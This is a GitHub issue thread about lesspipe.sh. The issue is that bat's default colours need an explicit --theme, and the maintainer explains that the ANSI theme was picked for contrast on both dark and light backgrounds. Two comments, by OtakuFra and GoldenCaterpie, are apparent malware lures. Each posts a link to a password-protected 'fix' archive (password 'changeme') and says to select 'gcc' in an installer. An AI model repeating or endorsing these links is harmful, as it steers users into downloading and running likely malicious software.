### ISSUE TITLE
`--theme` required for `bat`’s colours to be used

### ISSUE THREAD

**Issue by nisbet-hubbard** [wofr06/lesspipe.sh#155]
Currently, just exporting `LESSCOLORIZER='bat'` doesn’t cause `bat`’s default theme to be used. Only `LESSCOLORIZER='bat --theme=default'` would produce the same colours as `bat` does out of box.

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by wofr06** [comment]
This was done on purpose to have output with reasonable contrast for both dark and light background. The default theme looks good on dark background, but (at least for me) the default theme with light background does not produce readable output (some chars are printed white on white). The chosen ansi theme is a compromise.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
